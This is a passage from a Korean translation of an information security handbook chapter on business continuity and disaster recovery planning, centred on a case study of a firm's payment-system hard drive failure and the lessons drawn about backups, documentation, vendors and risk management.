화관리 ( OCM ) 개 념 을 련습하는것 은 CP 에 대 한 극히 각이한 방법 을 손쉽 게 해줄것 이 다. 마 
지 막으로 Web 기 반의 업 무과정 들이 24 X 7 가동시 간을 요구하기 때 문에 련속리 용성질서 의 
실현은 CP 공정이 가능한껏 충분히 개발되도록 하는데 필요하다. 
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제 3 9 장. 업무재개의 계획화와 
재해복구: 사실자료 


케빈 핸리 


업무재개와 재해복구의 계획화는 아마도 정보보안에서 쉽게 빠뜨리거나 뒤로 머루어 
놓는 부분일것이다. 업무재개계획을 준비하기 좋아하는 사람은 아마 별로 없을것이다. 보 
험에서와 같이 기대를 거는것이 결코 필요해서 그런것은 아니다. 그리고 이러한 문제들 
은 엄밀하지 못한 과학이기때문에 정확히 완성되였다는것을 확정하기가 매우 어렵다. 그 
러나 흔히 누구도 업무재개계획화를 고의적으로 지연시키지는 않는다. 이러한 문제들은 
다른 일감부하 그리고 비용, 시간과 같은 다른 제약조건，표면상 더 긴급한 과제들로 인 
하여 해결되지 못할뿐이다. 

모든 회사들중 50%미만이 자기 실정에 맞는 신뢰성 있고 완전하며 현실적인 업무재 
개 및 재 해복구계 획을 가지 고 있다. 때 문에 많은 회 사들은 사활적 인 업무재 개계 획의 결여 
를 보충하기 위하여 두개 의 방안을 고려 하고 있 다. 첫번째 방안은 회 사안에 서 위 험 관리 
자의 직무 즉 업무재개와 재해복구계획을 조정할 1차적인 책임을 가지는 직무를 두는것 
이 다. 두번째 는 매 개 발과제 에 업 무재 개 및 재 해 복구계 획 자금투자와 시 간일 정 을 작성 하는 
것이다. 이것은 개발과제에 착수하여 림의 성원들을 분산시키기전에 계획개발을 촉구할 
것을 목적으로 하고 있다. 이 방안들의 효과성은 개발과제종결전에 위험관리자의 역할과 
과제완성 을 조정 하는 상급경 영 진의 지 도에 크게 관계 된 다. 

기관들은 업무운영의 부분적인 또는 전체적인 중단을 실지로 체험하는것을 바라지는 않 
는다. 이러한 체험과정에는 괴로움도 있지만 즐거움도 있다. 재해복구를 체험한 회사는 장기 
간의 업무운영에서 리득을 볼수 있는 잠재력을 가지게 될것이다. 이 장은 콤퓨터체계고장의 
실지 사실자료와 재난으로 되는 사건들을 검토한다. 이 특이한 사건들에서 업무계획은 실시되 
였지만 언제나 그러하듯이 그것이 완성된 해결방도는 아니였다. 그러나 업무계획이 수립됨으 
로써 그것을 기준으로 하여 업무공정을 계측하고 기업운영을 계속해 나갈수 있었던것이다. 

업무재개계획은《정상》과정이 파괴되는 사고에서도 업무운영을 계속할수 있는 다 
른 방법 을 보장할수 있게끔 설계되 여 야 한다. 업무재 개계 획은 또한 업무과정 을 파피시킬 
수 있는 모든 형태의 경우를 다 취급해야 한다. 파피는 콤퓨터고장일수도 있지만 대체로 
보통의 업무운영 을 방해하는 내부 및 외부사건들에 의한것 이 다. 기 타 다른 파괴들은 화 
재，홍수 등의 환경적인것일수 있으며 또한 작업중단，가스루출，전원사고 등의 외부적 인 
요인일수 있다. 자료처리싸이트에서 얼마간 떨어 진 곳에서 급수관이 파괴되는것도 주목 
할만한 콤퓨터 체 계 고장요인 이 다. 공기 조화장치 에 물공급이 중지 될 때 공기 조화장치 는 차 
단되며 자료쎈터는 순식간에 과열된다. 

업 무재 개 계 획 및 재 해 복구계 획 의 1 차적 인 목적 은 재 해 발생 가능성 을 줄이 는것 이 다. 
이것은 정확히 작성된 업무재개계획의 초기단계의 본질적인 산물이다. 업무재개림이 
계획을 개발하려는 분야를 검토한다면 체계 또는 회사가 직면한 위험을 알수 있게 된 
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다. 이렇게 되면 또한 운영고장을 일으킬수 있는 약한 고리를 포착하고 식별할수 있 
다. 이 약한 고리는 체계，처리과정，하드웨어，쏘프트웨어，숙련부족，예견하지 못했던 
인사문제에서 발견될수도 있고 환경 또는 외부위협형태로 발견될수도 있다. 계획의 
목적은 다음으로 업무공정의 기반을 마련하여 다른 방법으로 기업의 정상운영을 재개 
하는것이다. 업무재개계획의 실현속도는 1차적으로 체계의 중요성에 의존한다. 중요한 
체계(병원，비행관제 등)는 몇초 또는 몇분안으로 동작할수 있도록 계획을 세워야 하 
며 그리 중요하지 않은 체계는 수일 지어는 수주일동안 천천히 동작상태에 이르도록 
계획을 세울수 있다. 성공적인 업무재개씨나리오에 대한 좋은 실례로는 1999년에 3주 
동안 운영관제쎈 터 를 페 쇄 시 킨 화재 에 도 불구하고 운영 을 계 속 진행한 유나이리 드 애 
어라인즈항공회사의 능력을 들수 있다. 그 싸이트에서는 하루에 2,500여회의 비행을 
관제하고 있었지만 이 회사는 한 시간도 안되여 후원싸이트에서 처리를 다시 시작할 
수 있었으며 결과 한번의 비행이 취소되고 몇번의 비행이 조금 지연되였을뿐이였다. 
다행 히 도 이 후보싸이트는 새 로운 업 무재 개계 획의 개 발부분으로서 도입검 사의 마지 막 
단계에 있었던것이다. 

일단 재난이 들이 닥치면 업무그룹의 1차적인 목적은 가능한껏 중요한 체계에 운 
영 상 영 향을 주지 않으면서 운영 을 재 개하며 동시 에 재 해 복구계 획 을 실현하는것 이 다. 
재해복구계획의 1차적인 목표는 한도이상의 손해를 방지하는것이다. 이것은 최우선적 
인 목적 으로 개 인의 안전을 담보한다는것 을 의 미한다. 재 해 복구계 획 은 새 분야 즉 손 
상된 싸이트의 정리(페품수집 및 수리)，예비업무운영의 지원，정상과정에로의 이행으 
로 갈라 진다. 

업무재개 및 재해복구계획의 최종목표는 업무운영 이 정상 또는 재 난이전상태 로 다시 
시 작할수 있을 때 달성되게 된다. 제때 에 운영 을 회 복하거 나 재 개할수 없다면 그것은 전 
체 업 무고장의 약 50%라는 파괴 적 인 통계값을 초래한다. 

업 무재 개 및 재 해 복구계 획 이 효과적 인것 으로 되 자면 완전히 문서 화되 여 야 한다. 모든 
책 임과 과제，쏘프트웨어와 하드웨 어，통신회선들，보안요구조건들이 문서로 작성되여 요 
구될 때 즉시 리용할수 있어야 한다. 재난이 일어 난 다음에 업무운영에 대한 풍부한 경 
험 과 리해를 가지 고 있는 직 원들과 상담하여 업무재 개 를 계 획하는것은 충분한것 이 못된 
다. 정확히 문서화되면 누구든지 그 문서를 읽고 동일한 결론을 내리고 동일한 작용을 
수행할것 이 다. 바로 이 렇게 될 때에만 문서화가 철저 히 그리고 명백히 진행되였다고 할 
수 있다. 


사실자료 


이 사실자료는 Serv - co (가명)가 체험 한 실제적 인 사건들이 다. 이 재난으로부터 배우 
게 되는 정보량은 아주 방대하다. 즉 재 난을 일으키고 재 난에 기여하는 사건들의 순서를 
고찰함으로써 그 재난을 조종할수 있는 경험을 배울수 있다. 
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그림 39-1. 지불체계배치도 

Serv - co 는 회사의 수입지 불전체 즉 인터 네트우편지 불검사 그리고 자체은행과 독자적 
인 대리점 및 대표부 등 Serv - co 의 대리점들이 취급하는 지불처리체계(그림 39 — 1) 를 가 
지 고 있었다. 지불처 리체 계는 매 일 25,000건이상의 지불을 취급하였다. 이 수입지불은 세 
개 의 워 크스테 이 션에서 취 급되 였 다. 워 크스테 이 션조작수들•은 지 불량과 계 산수자를 워 크 
스테이션에 입력시킨다. 일단 천건의 지불이 입력되면 그 파일은 닫기며 중앙봉사기에 
전송된 다. 파일 에 조종이 부여 되 면 파일 의 무결성 과 오유람지 를 협 조한다. 지 역 관리자는 
하루에 한번씩 봉사기 에 등록하며 그날의 처 리파일 을 다 하나의 큰 파일 로 묶는다. 예 비 
적 인 장부처 리 가 이루어 지면 관리자는 모든 고객구좌관리와 송장작성을 취급하는 낡은 
메 인프레 임 체 계 와 통신회 선을 확립 한다. 관리 자는 그 메 인프레 임 에 축적 파일 을 전송한다. 
일 단 대형콤퓨터체계 가 수신하면 모든 지불활동을 개 별적 인 고객구좌들에 공시하는 묶음 
처리가 실행되였다. 

유감스럽게도 어느날 지불처리체계가 고장났다. 모든 고장이 그러하듯이 많은 사람 
들의 마음이 이미 해변가에 가 있는 한 여름철 금요일 오후에 지불처리체계에 고장이 발 
생하였 다. 지 역 관리자는 지 원제 작업 체 에 전화를 걸 어 그날 지 불총계파일 을 대 형 를퓨터 체 
계 에 전송하려 고 할 때 이상한 오유코드가 나왔다는것을 알렸다. 

메 인트그룹 (Maint Group ) 이 라는 지원회사는 월요일 아침에 Serv - co 에 나와서 문제를 
조사하고 바로 잡겠다고 금요일 밤에 합의하였다. 회사는 심중한 문제가 아닌것으로 생 
각하였다. 지난 시기 에 약간의 체계고장이 나 파일오유불균형 으로 고객들의 구좌에 대 한 
지 불공시 가 하루 이 틀정 도 지 연되 는 일 이 드문히 있 었 던 것 이 다. 
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월요일 아침 일찌기 메인트그룹의 기술자가 좋은 기분으로 도착하여 인사교환이 있 
었다. 메인트그룹은 그 장비의 본래제작업체가 아니였다. 즉 메인트그룹은 원래의 제작업 
체가 업무를 중단했을 때의 보수계약의무를 맡고 있었다. 그 기술자의 안색은 순간적으 
로 흐려 졌다. 그는 이 장비에 대하여 수년간의 경험을 가지고 있지만 결코 이러한 오유 
상태는 겪어 보지 못하였다는것을 인식하였던것이다. 이 시점에서 사무망과 제2부류지원 
그롭을 가진 그 대규모제작업체의 가치는 명백해 졌다. 이것은 일반적오유가 아니였으나 
그 기술자는 다른 분야와 접촉하여 도움을 받을수 있었다(표 39 — 1을 볼것). 

표 39-1 제작업체의 선택 


하드웨어나 쏘트트웨어를 새로 구입할 때 또는 회사내지원과 외부보수계 약합의를 판단 
할 때 제작업체의 선택은 매우 중요하다. 선택 할수 있는 회사의 수는 제한되여 있으며 특히 
독립적인 제품들을 포함하고 있을 때 더욱 그러하다. 그러나 가능한 회사나 대리점이 기초적 
인 갱신과제들을 수행하고 감독할수 있게 자체로 충분한 기술을 유지하도록 해야 한다. 이것 
은 제작업체의 실수나 제작업체의 로동분규에 대처한 보호수단으로 된다. 또한 대규모제작업 
체를 선택하는것은 국부적인 작은 제작업체를 선택할 때보다 더 많은 비용이 들수도 있다. 

제작업체가 들수록 보다 많은 비용으로 보다 많은 기술과 장비의 지원을 제공할수 있 
으며 보다 작은 제작업체일수록 보다 빠르고 개인적인 준위의 봉사를 제공할수 있는것이다. 
그 제작업체가 추상적인 또는 주문문제들을 취급할수 있도록 적절한 위치에 적당한 지원체 
계를 가지고 있는가와 예비요소들에 접근할수 있는 준비가 되여 있는가를 재검토한데 기초 
하여 제작업체를 선택하여야 한다. 이때 그러한 지원을 위하여 보다 많은 비용이 들수 있으 
며 재 난환경 에서 그것은 중대 한것으로 된다. 


오유는 하드디스크의 고장이며 하드를 교체해야 한다는것이 판명되였다. 여기서 
Serv-co 지불처 리체계의 기본결함이 명백해 졌다. Serv-co 는 체계를 구입할 때 봉사기급 
의 장치 를 구입할 대 신에 하나의 하드구동기 와 하나의 전원만을 포함한 체 계봉사기 를 구 
입하였다. 이로 하여 Serv-co 자체의 정보체계표준그룹은 체계의 보수와 감독을 맡을것을 
거 부하였 다. 

처음에 구입할 때부터 지불처리그룹은 또한 새로운 위치에 옮겨 졌다. 이것은 그들 
의 워 크스테 이 션과 봉사기 가 새 로운 시설로 이동한다는것을 의미한다. 장비 들이 안전한 
방에 위 치하였지 만 적 당한 전원공급이 보장되 지 않았으며 적 당한 환경 조건도 보장되 지 
않았다. 봉사기 자체도 탁상과 같은 선반에 설 치되 였다. 더우기 여 벌레 프를 위한 안전하고 
조직 화된 기 억설비 도 보장되 지 않았다. 지 불처 리작업그룹은 콤퓨터 에 커 다란 흥미 를 가 
지고 장비를 다루는데서 아주 열성적인 몇명의 직원들을 가지고 있었으나 그들은 알맞춤 
한 훈련이나 지식이 없었고 체계설치에서의 일부 기본적인 결함을 식별할수 없었다. 

많은 회 사들과 마찬가지 로 Serv-co 는 몇 년전에 몇 가지 기 본적 인 구조조정 을 진행 하 
였다. 그 일부로서 체계에 대하여 가장 잘 인식하고 있는몇명의 종업원을 정리해고안에 
따라 Serv-co 에서 내보냈다. 체계에 대한 문서화는 거의 없었거나 완전히 없었기때문에 
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체계에 대한 실지 지식은 그들과 함께 많은 량이 없어 지게 되였다(표 39_2를 볼것). 


표 39-2 


문 서 화 


문서화는 아마도 재난대응책으로서 가장 중요한 자원인것 같다. 그것이 정확히 준비된 
다면 모든 직원들이 자기들의 과제와 책임을 러해하고 그 과제가 재난속에서 다른 활동들과 
어떻게 련관되는가 하는것을 리해할수 있다. 리상적으로 문서화는 명백히 표준형식으로 진행 
되여 문서의 흐름을 러해하는데 시간과 노력이 들지 않게 해야 한다. 이것은 그 문서를 읽는 
사람은 다 같은 결론을 내리고 갈은 작용을 수행한다는것을 의미한다. 

문서화는 체계주위의 모든 과정들과 과제들에 대 하여 특히 루린이 나 사소한 일상 과제 
들에 대하여서 i 진행되여야 한다. 흔히 그것은 전문가들만이 할수 있는 과제 이 다. 


다시 사실 자료로 돌아 가자. 그 기 술자는 이 제 봉사기 를 위한 새 로운 하드구동기 를 
구해 야 한다. 장비 는 12년 이 상 오랜것 이 기 때 문에 그것 은 구식이 며 매 부분품들은 구하기 
가 아주 힘들게 되였다. 사실상 메인트그룹은 2년전에 통고를 보내면서 이 체계의 하드 
구동기 는 제 작자가 계 속 생 산하는것 이 아니 며 예 상수명 을 초과하였 다는것 을 지 적하였 다. 
메 인트그룹은 즉시 장비 를 교체할것 을 권고하였 다. 이 충고와 함께 메 인트그룹은 또한 
이러한 제한성으로 하여 《최선을 다하여》그 장비들을 계속 지원해 줄수 있을뿐이라고 
지 적 하였 다. 

그 기 술자는 다른 도시 에 서 하드구동기 를 찾을수 있 었 으며 다음날 (화요일) 아침일 
찍 Serv - co 에 보내줄것을 합의하였다. 

화요일 아침 짐함이 도착하였 으나 그안에 들어 있는 구동기 는 짐함겉 면 에 표시 된것 
과는 다른것이였다(명백히 이 러한 중요한 송달이 요구될 때에는 언제 나 발송자가 송달내 
용물을 검증하는데 필요한 단계를 취 해 야 한다). 

이 시점에서 Serv - co 는 사소한 고장으로부터 기본재난으로 이행하기 시작하였다. 날 
이 감에 따라 Serv - co 에 지불하는 고객의 수가 늘어 나고 그들은 지불에 응하지 못한다 
는 통지 를 받게 되 였 다. 더우기 이 통지 는 거 래 자들에 게 부당한 지 연지 불부담을 할당한 
다. 이 것은 고객봉사대 표부들에 게 작업 부담을 증가시 켰으며 가난한 고객 들의 신고와 나 
아가서 대중보도계 에 불쾌한 여 론을 일으켰다. 결국 이 재 난으로 15,000명 이상의 고객들 
이 피해를 입었다. 

메인트그룹은 온 나라를 뒤져서 하드구동기를 두개 더 찾아 냈으며 다음날 아침에 
Serv - co 에 송달하도록 합의하였다. 그러나 수요일아침에 송달이 진행되지 못하였다. 정기 
항공로의 파괴로 하여 비행이 취소되였으며 그 짐함은 결국 도착하지 못하였던것이다. 

목요일 아침에 다행히도 대체품하드구동기가 도착하였다. 기술자는 안심하고 그것을 
설 치 하기 시 작하였다. 다 설치한 다음 기술자는 새 구동기 에 조작체 계를 적재하기 위하 
여 지 역 관리자에 게 체 계 복사본을 요구하였 다. 관리 자는 책 상우의 당반에 서 낡은 레 프통 
을 꺼내 기술자에게 넘겨 주었다. 그롭에서 콤퓨터지원인원들을 축소한 이 후로 몇년동안 
관리 자는 성 실 하게 예 비파일 들을 취 하여 이 레 프에 기 억 시키 고 있 었 다. 그가 알지 못하 



고 있었던것은 자기가 보관해 놓은 모든것이 조작체계가 아니라 일상적으로 쓰는 거래파 
일들이였다는것이다. Serv - co 는 조작체계의 중요한 예비복사본을 가지고 있지 못하였다. 

메인트그롭기 술자는 자기 의 기 술집 단에 전화를 걸 어 조작체 계 의 일 반 복사본을 리용 
할수는 있 으나 본래 제 작업 체 (기 억 하고 있는바와 같이 업 무를 중지하였 다)가 조작체 계 에 
설 치 하였던 특정한 요구는 실현될수 없다는것을 알게 되 였다. 이 일반복사본이 설 치되였 
으나 현재 상태 로는 리 용할수가 없었 다. 메인트그롭은 즉시 에 Serv - co 응용의 요구에 맞 
게 조작체 계 에 수정 을 가하기 시 작하였 다. 이 수정본은 다음주 목요일 에 준비 된 다고 약 
속되 였 다. 

이 단계에 와서 고객들에게 주는 영향이 사활적인것으로 되였기때문에 Serv - co 는 자 
기 의 업 무지 속성 프로그람을 검 토하기 시 작하였 다. 정 확한 프로그람이 그러 하듯이 그것 은 
위험시간인자를 반영 하였으며 이 그룹에 적용되 였다. 관리 자는 지불처 리 가 Serv - co 에 의 
하여 제 공되 는 기 타 일 부 봉사들만큼 중대하지 않다는것 을 고려하여 업 무과정 이 다시 시 
작되기전까지 며칠간 지연될수도 있게 계획을 설계하였다. 업무재개계획은 지불들을 재 
정 통계계 산프로그람에 수동적 으로 입 력 시 키 는 방법 으로 계 획 되 여 있 었다. 이 통계프로그 
탐은 낡은 메인프레임체계와 FTP 로 련결되여 있었으며 묶음처리는 새로운 파일들을 읽 
는데 적 용할수 있었다. 이 것은 방대한 로동집 약형운영 이였으며 Serv - co 안의 각 부서들에 
지령이 떨어 져 이 지불들을 입력시키기 위하여 직원들이 오래동안 주말휴식기간에도 작 
업하게 되 여 있 었 다. 

수동적 인 작업 이 진행 되 기 때 문에 완성 된 통계프로그람에 서 오유를 탐지하는데 보다 
많은 직 원들이 요구되 였 다. 사실 창조된 많은 통계프로그람에 서 단 한개 만이 오유가 없 
는것으로 판정되 였다. 지역지불처 리관리 자는 위험관리그롭을 호출하여 업무지속성계획실 
현에 대하여 경고를 주었는데 오히려 자기 직무에 전념하라는 충고를 받았다. 이것은 위 
험관리그룹의 역 할에서 파멸적 인것 으로 되 였 다. 위 기 관리 및 과정 흐름에 대 한 지 식과 인 
사과，법률과，회사통신과 등과 갈은 다른 그룹들과의 친밀성으로 하여 그들은 이 재난을 
처 리하는데서 실 질적 인 협 조를 보장할수 있 었 다. 그러 나 많은 부서 들과 같이 위 험 관리부 
는 휴가로 하여 인원이 부족되였다. 이와 같이 협조와 지원이 없었으므로 지역지불처리 
관리 자는 곧 다른 그룹으로부터의 운영예정 과 회 복에 대 한 호출로 하여 당황하게 되 였 다. 
관리자와 그룹의 기타 사람들의 시간상요구는 업무요구에 대한 응답능력에 더욱더 영향 
을 주었다. 위험관리부로부터 자료를 받지 못한데 대한 다른 결과는 로조단체들과 정확 

한 련계 가 이 루어 지 지 못한것 이 며 회 복노력 을 위하여 지 원을 받을 대 신 관리 자가 또 다 

른 로조단체들로부터 직 원문제 에 대 한 몇 가지 불만건에 직면한것 이 다. 

이것은 토사관계의 전반 풍조에 따라 피할수 없는것이 였 다. 로조와의 련계 를 옳 

게 가졌더 라면 이 미 조성된 팽팽한 환경속에서도 더 이상 악화되 지 않았을수도 있었 

을것 이 다. 

화요일 아침 메 인트그룹기 술자는 조작체 계 수정 본을 가지 고 도착하였 다. 그것 을 설 치 
하자 수정본은 몇 가지 기 능을 제 공하였지 만 오유탐지 와 장부처 리 기 능의 많은 부분이 결 
핍되게 되 였다. 또한 봉사기는 메인프레 임과 통신회선을 확립할수 없었다. 후에 야 회선이 
설치되 였는데 그것은 두 기술자가 3일에 걸처서 진행하였다. 역시 문서화가 제대로 진행 
되 지 못하였 으므로 중요한 정 보부분을 놓쳤 던것 이 다. 다행 히 도 몇달전부터 통신회 선목록 
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을 작성 하고 있 던 LAN 지 원 자에 의하여 구성복사본 이 휴지 통에 서 발견되 였 다. 

그 다음주에 Serv - co 는 자기 의 지 불처 리 를 진행할수 있 었으나 인력 과 신용에서 많은 
비용이 들었다. 

고장시에 Serv - co 는 이미 교체체계를 샀으나 제작업체가 아직 그것을 송달하지 못하 
였 다는것 은 주목할만한것 이 다. 이 과정 은 구식장비 라는것 이 판명 된 2년전부터 시 작되 였 
다. 그러 나 그것은 로상에서 몇 가지 장애 에 부딪쳤다. 관리부는 두번이 나 지불처 리부서 에 
구입제 안을 보냈고 다른 방안(해외구입)과 보다 비용이 적게 드는 대책을 제기하였다. 이 
것은 교체를 오래동안 지연시켰으며 결국에는 현재의 장비가 고장나게 되였다. 

또한 지불처 리지 역은 정 보체 계표준그룹의 조언을 받지 않고 교체체 계를 구입하였다. 
결과 새 장비는 낡은 장비와 비슷하게 한개의 하드구동기와 한개의 전원을 가지고 있었 
다. 그것은 또한 단독체계로 설계되였으며 계획은 련합기업체기억체계의 후원을 받도륵 
작성 되지 못하였다. 실지 로 정보체 계표준그룹은 다시 한번 그것 이 새 로운 체 계를 지 원하 
지 못할것이며 개발과제와 관계되는것은 오직 유산체계에 대한 결합부가 정확히 동작할 
것 이 라는것 뿐임 을 선 언 하였 다. 

결국 Serv - co 는 이 재난으로부터 무엇을 배우게 되였는가, 독자들은 무엇을 배울수 
있는가，아마 많을것이다. 


전문가지 원 


모든 체계들은 정보체계 ( IS ) 전문가의 감독하에서 설치되며 회 사표준에 따라 진행되 
도록 해야 한다. 단독체계의 조달 및 지원에서 IS 측과 적극적인 련계를 가지는것은 많은 
사소한 오유들이 중대 재 난으로 넘 어 가지 않게 해줄수 있 다. 만일 회 사가 표준을 자체 로 
개 발하지 않는다면 비 호환성장비 들을 통하여 보안하부구조에 서 발생하는 그이 상의 결 함 
들을 방지하게 될 것 이 다. 장비 가 더 욱더 표준화될 수록 자체 의 지 식 으로도 정 확한 조작체 
계 수정 본을 최 신판으로 보다 쉽 게 유지할수 있 다. 표준장비 는 또한 부하공유를 더 쉽 게 
해주고 단일고장점 을 최소화해 준다. 이를 위하여 모든 회사블은 자기들의 모든 체계 에 
대 한 지 능적 인 지원을 확보해 야 한다. 특히 체계 가 외부계 약자에 의하여 개 발될 때 에는 
체계에 대한 지식이 그 개발과제에서 빠지지 않도록 해야 한다. 재난이 해소된 다음 
Serv - co 의 지불처리와 IS 부서는 협동하여 교체체계를 다시 설계하기 시작하였다. 여기에 
는 기 업체기 억체계후원과 봉사기급의 장비구입 이 포함되 여 있었다. 

예비본 

모든 조작체 계 들에 대 하여 정 확한 예 비본이 있 어 야 한다는것 은 두말할 필요가 없 다. 
흔히 그것 은 자칫하면 빠뜨려 놓을수 있는 구성 (통신，경 로기 등)과 규칙기 지 (방화벽 )이 
다. 모든 경 우에 예 비본은 처 리 주기 가 필 요하다면 다시 구성 될 수 있 다는것 이 충분히 담 
보되도록 진행되여야 한다. 체계가 어떤 파일들을 2차 또는 3차로 유지하는 경우에 대한 
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실례는 많다. 고장이 발생하면(특히 고장이 응용프로그람변경에 관계될 때) 프로그람작성 
자는 그 과정을 다시 실행시켜 보아야 한다. 만일 재실행이 실패하면 그 예비본은 이미 
낡았다고 보고 문제를 교정하기전에 지워 버리는 일이 있을수 있다. 재정기록에 대한 장 
기간의 보유와 같이 예비본에 대한 모든 요구가 만족되도록 하는것 이 또한 중요하다. 

오늘날에는 여 러 가지 테프 및 CD 를 비롯하여 각이한 형 태의 예 비본매체들이 있다. 
최 근의 CD 문서 화는 불리한 조건에 서 도 200년까지 의 수명 은 문제 로 되 지 않으며 난문제 
는 암호화열 쇠 가 안전하게 보관되 도록 하는것 과 CD 를 읽 는데 필 요한 쏘프트웨어 가 요구 
될 때 마다 리용가능하도록 하는것 이 다. 

예비본은 기록할 때에는 항상 예비복사본을 읽기가능하도록 해야 한다. 어느 한 회 
사는 최 근에 디 스크자두쓰기 고장으로부터 회 복을 시 도하다가 새 로 구입한 20개 테 프들중 
4개 가 고장이 라는것 을 발견하였 다. 예 비본으로부터 회 복할 필요가 있는 시 점 에서 예 비 본 
이 고장난다면 문제의 범위는 지수적으로 확장된다. 

설비로화 

지금 회 사들과 대 리 점들에서 리용하고 있는 많은 장비 들은 이미 자기 수명 을 초과한 
것 들이 다. 특히 하드구동기，전원，레 프인 경 우에 더 욱 그러하다. 모든 설비 에 대 하여 규 
정대로 목록을 작성하고 설비명세를 재검토하여 그것이 여전히 신뢰성 있도록 해야 한다. 

의존성 

많은 체계들과 업무과정들은 거기에 의존하고 있는 다른 체계들에 대하여 인식하지 
못하고 있다. 또 그것들자체 가 처 리를 위하여 의존하고 있는 체 계들을 알지 못하고 있다. 
내부 및 외부체계의존성을 전부 보여 주는 상세한 흐름도를 작성하여 체계가 고장나는 
경우 그것이 다른데 영향을 미친다는것을 즉시 나타 내도록 해야 한다. 이것은 통제를 
받아야 하는 재정체계와 재정부문에서 특히 중요하다. 여기서는 한개 파일이 빠지면 눈 
에 크게 띄지 않을수 있으나 처리 또는 법적처벌에 큰 영향을 미칠수 있다. 

암호화 

체계가 어떤 암호화형식을 가진다면 회복을 위하여 모든 열쇠를 안전한 장소에 보관 
하는것 이 필요하다. 흔히 체계 가 얼마동안 동작하고 있으면 열쇠는 잊 어 버린다. 체계 가 
고장을 일으킬 때 열쇠를 알지 못한다면 그것은 극히 위험한것 으로 된다. 직 원이 회 사문 
서 나 파일 에 대 하여 암호화를 리용할 때 에는 반드시 열쇠사본이 안전하고 믿음직한 장소 
에 보관되여야 한다. 지금까지 사고나 퇴직으로 직원이 없어 진것으로 하여 회사가 중대 
파일을 회복할수 없게 된 일들이 많이 일어 났다. 최근에 어느 한 회사에서는 부정행위 
로 하여 뢰 직 당하게 된 직 원이 자기열쇠와 몇개의 중요체 계 에 대 한 관리통과암호를 내놓 
기 를 거 절 함으로써 회 사에《 인 질》로 잡힌 일 이 있 었 다. 
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제작업체고장 


모든 정보처리분야에서 가장 보편적인 특성의 하나는 제작업체의 변경일것이다. 거 
의 매일이다싶이 제작업체들은 문을 열고 닫고 합쳐 지며 업무방향을 변경시키고 있다. 
이렇게 기술을 보다 새로운것으로 빨리 교체하는것으로 하여 업무재개계획은 일정한 영 
향을 받고 있다. 정보체계전문가들은 자기들의 제작업체지원망의 상태를 계속 알고 있어 
야 한다. 제작업체전화번호목록과 접촉목록은 업무재개계획에 함께 유지되여야 하며 많 
은 계획들에는 주요고장사고에서의 우선권에 기초하여 새로운 장비를 공급하도록 제작업 
체들로부터의 약속도 포함되 여 야 한다. 

제 작업 체 가 공급한 쏘프트웨어 는 신용이 담보된 3자에 게 보관되 여 제 작업 체 가 그 유 
지를 만족시킬수 없거나 계약상조건을 갱신할수 없는 경우에 리용할수 있도록 되여 있어 
야 한다. 

새 로운 장비 를 구입할 때 위 험한것 은 항상 그것 이 계 속 생산되 며 지 원될것 인가 아닌 
가 하는것 이 다. 일 련의 회 사들은 최 근에 구입한 장비 들에 대 하여 보수합의 를 얻 을수가 
없었다. 왜냐하면 제작업체들은 새로운 업무방향으로 이동하였으며 어떤 제품계렬은 포 
기 하였 기 때 문이 다. 

제 작업 체 를 선택할 때 대 규모의 지 원망과 여 유장비리 용가능성 을 가지 고 있는 높은 
가격의 제 작업체 를 택 함것 인가 아니 면 보다 작고 지 역적 인 제 작업 체를 택하고 여 유부분 
품을 구입하며 자체의 전문가집 단을 크게 꾸리 는것 으로 위험 을 완화시 키 겠는가 하는 판 
단을 내려야 한다. 


BCP 으 I 갱신 


종합적 이 고 완성된 업무재개계 획을 설정 하는것은 어 려운것 이지만 계획설정 으로 완성 
되는것은 아니 다. 회사，부서，기관은 여전히 끊임 없는 갱신을 위하여 앞선기준에서 계획 
을 책임진 사람을 선정해야 한다. 

계획은 적어도 1년에 한번 그리고 부서구조가 크게 변화되는 경우에 다시 검토되여 
야 한다. 이 책임은 업무재개계획을 유지하고 공동위험관리림에 부서를 대표할 사람의 
직능규정으로 밝혀 져야 한다. 만일 부서가 일상적으로 일감을 재검토한다면 이 책임고 
수문제는 재검 토되 여 야 한다. 


로 동조함 


오늘날 로동조합은 많은 회사들에서 현실적으로 존재하며 그것으로 하여 종업원들과 
경영자들은 일련의 법적인 제한조건들을 준수해야 한다. 법률적인 견지에서 로조의 성 
원인 어느 개인과 따로 합의를 교섭하는것은 비법이다. 위기가 오면 흔히 경영자들은 개 



별적인 지불이나 보상을 종업원들과 직접적으로 교섭하려고 시도해왔다. 이것은 현실성 
있는듯하지만 이것 역시 위법이다. 업무재개계획에는 업무중단으로 영향을 받거나 거기 
에 관계될수 있는 비로조단체들을 위하여 로조대표와 접촉하는 방법이 반영되여야 한 
다. 바라건대 신속한 통보를 하면 로조는 재난에 복잡성을 더해주는것이 아니라 재해복구 
와 직원조정 활동에 도움으로 된다. 

회사안에 로조가 있건없건 인사과는 재해복구사업에 개입하여 해당 로동관계법이나 
로동관계규정들이 준수되도록 하여 야 한다. 

우 I 험 관 리 


많은 회사들과 대리기관들은 부서별계획의 조정과 외부 및 내부그룹과의 련락，위기 
속에서의 지휘를 총 책임진 위험관리그룹을 가지고 있다. 이 그롭은 회사의 고위관리들 
과 무제한한 접촉을 가질 필요가 있으며 임의의 업무환경파괴속에서 협조 및 지도에 대 
한 위임권을 가지고 있어야 한다. 이러한 위임이 없이는 위험관리그룹이 흔히 위기속에 
서 도움을 줄수 있는 기본문제전문가 ( SME ) 들을 얻기 어려울수 있다. 왜냐하면 또 다른 
그롭의 관리자가 그들을 자기의 기본의무로부터 떼여 내기를 거절하기때문이다. 

위 기 속에 서 이 그룹의 4가지 집 중령역 은 통보，협 조，통제，조정 이 다. 정 확히 설정 된 
그룹을 가진 회사는 누가 담당자이며 상반되는 명령을 전달하고 있는가를 확신하지 못하 
는 경 쟁그룹들의 《 알렉 싼더 하이그중후근》을 방지할수 있 다. 

이 그룹성원들가운데서 한 사람이 필요할 때마다 회사의 건강 및 안전그룹의 성원으 
로 되여야 한다. 이러한 위기속에서 개별적로동자들의 건강문제 즉 정신적，물리적건강에 
정 확한 주의 가 돌려 지도록 하여 야 한다. 

재 난속에 서 위 험 관리그롭은 또한 회 사 또는 재 난에 관계 되 는 모든 광고활동을 정 지 
혹은 금지시키며 개 인들이나 기 관이 대중보도를 주시하도록 하며 회사의 성명과 발표가 
어떻게 사회에 접수되고 있는가에 대한 반향을 회사에 알려 주도록 하여야 한다. 

많은 위 험 관리그룹에 서 놓칠 수 있는 두개 의 인 자는 재 해 복구기 간 비 상사태운영 쎈 터 
